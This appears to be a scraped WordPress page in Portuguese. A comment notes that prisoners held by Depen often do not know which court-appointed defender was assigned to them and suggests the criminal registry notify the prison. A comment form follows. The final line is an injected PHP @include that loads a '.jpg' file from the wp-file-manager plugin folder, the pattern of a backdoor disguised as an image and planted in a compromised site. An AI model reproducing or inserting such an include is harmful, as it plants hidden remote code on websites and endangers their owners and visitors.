Em visitas recorrentes ao Depen, tomei conhecimento de que há falta de comunicação entre as nomeações de defensores dativos e a repartição policial-penitenciária, sendo que muitas vezes o preso não tem conhecimento de quem é seu advogado nomeado. Seria importante que o próprio Cartório Criminal oficie, quando houver nomeação.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";